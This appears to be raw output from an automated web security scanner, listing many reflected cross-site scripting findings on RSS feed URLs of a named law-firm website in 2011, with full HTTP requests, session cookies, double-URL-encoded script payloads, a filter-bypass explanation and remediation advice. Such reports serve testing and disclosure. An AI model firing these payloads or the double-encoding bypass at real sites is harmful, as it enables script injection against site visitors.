GET /rss/practices/Employment__Labor/rss.xml7e26b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea05a8e876db HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac191%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e408ea2dc39c was submitted in the REST URL parameter 1. This input was echoed as ac191"><script>alert(1)</script>408ea2dc39c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssac191%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e408ea2dc39c/practices/Environment__Safety/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faef9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09c7b47057d was submitted in the REST URL parameter 2. This input was echoed as faef9"><script>alert(1)</script>09c7b47057d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesfaef9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09c7b47057d/Environment__Safety/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14f97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf3bd752872 was submitted in the REST URL parameter 3. This input was echoed as 14f97"><script>alert(1)</script>df3bd752872 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Environment__Safety14f97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf3bd752872/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8458%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9d96a6b3a12 was submitted in the REST URL parameter 4. This input was echoed as a8458"><script>alert(1)</script>9d96a6b3a12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Environment__Safety/rss.xmla8458%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9d96a6b3a12 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53bc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4c6054d33b2 was submitted in the REST URL parameter 1. This input was echoed as 53bc2"><script>alert(1)</script>4c6054d33b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss53bc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4c6054d33b2/practices/Food__Drug_and_Product_Safety/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99d18%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1c0da64d82 was submitted in the REST URL parameter 2. This input was echoed as 99d18"><script>alert(1)</script>a1c0da64d82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices99d18%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1c0da64d82/Food__Drug_and_Product_Safety/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de427%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3670bef0e21 was submitted in the REST URL parameter 3. This input was echoed as de427"><script>alert(1)</script>3670bef0e21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Food__Drug_and_Product_Safetyde427%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3670bef0e21/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f92a2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e41efcd82b21 was submitted in the REST URL parameter 4. This input was echoed as f92a2"><script>alert(1)</script>41efcd82b21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Food__Drug_and_Product_Safety/rss.xmlf92a2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e41efcd82b21 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6fba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4316059e06 was submitted in the REST URL parameter 1. This input was echoed as a6fba"><script>alert(1)</script>a4316059e06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssa6fba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4316059e06/practices/Franchise/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b78b0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9778950fc0 was submitted in the REST URL parameter 2. This input was echoed as b78b0"><script>alert(1)</script>9778950fc0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesb78b0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9778950fc0/Franchise/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4984%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61790d4d9a8 was submitted in the REST URL parameter 3. This input was echoed as d4984"><script>alert(1)</script>61790d4d9a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Franchised4984%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61790d4d9a8/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 214b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e273c67fee0b was submitted in the REST URL parameter 4. This input was echoed as 214b4"><script>alert(1)</script>273c67fee0b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Franchise/rss.xml214b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e273c67fee0b HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2dde%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed620a3a2e2 was submitted in the REST URL parameter 1. This input was echoed as f2dde"><script>alert(1)</script>ed620a3a2e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssf2dde%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed620a3a2e2/practices/Government_Contracts/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad839%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb98612c93e6 was submitted in the REST URL parameter 2. This input was echoed as ad839"><script>alert(1)</script>b98612c93e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesad839%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb98612c93e6/Government_Contracts/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8ea8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c519c08fc2 was submitted in the REST URL parameter 3. This input was echoed as a8ea8"><script>alert(1)</script>7c519c08fc2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Government_Contractsa8ea8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c519c08fc2/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c8b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f8e8ef06bb was submitted in the REST URL parameter 4. This input was echoed as 9c8b4"><script>alert(1)</script>4f8e8ef06bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Government_Contracts/rss.xml9c8b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f8e8ef06bb HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86cb4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd584c5ec86 was submitted in the REST URL parameter 1. This input was echoed as 86cb4"><script>alert(1)</script>fd584c5ec86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss86cb4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd584c5ec86/practices/Health_Care/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc67c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed7658866ddf was submitted in the REST URL parameter 2. This input was echoed as cc67c"><script>alert(1)</script>d7658866ddf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicescc67c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed7658866ddf/Health_Care/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f87dc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee3d1a37ca4 was submitted in the REST URL parameter 3. This input was echoed as f87dc"><script>alert(1)</script>ee3d1a37ca4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
